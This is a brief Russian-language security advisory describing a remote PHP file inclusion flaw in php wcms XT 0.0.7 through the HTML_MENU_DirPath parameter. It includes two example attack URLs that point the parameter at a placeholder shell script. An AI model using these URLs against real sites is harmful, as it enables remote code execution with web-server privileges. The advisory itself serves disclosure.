Программа: php wcms XT 0.0.7

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «HTML_MENU_DirPath» сценариями config_HTML_MENU.php и config_PHPLM.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=[[Sh3LLScript]]

http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=[[Sh3LLScript]]



Оставить мнение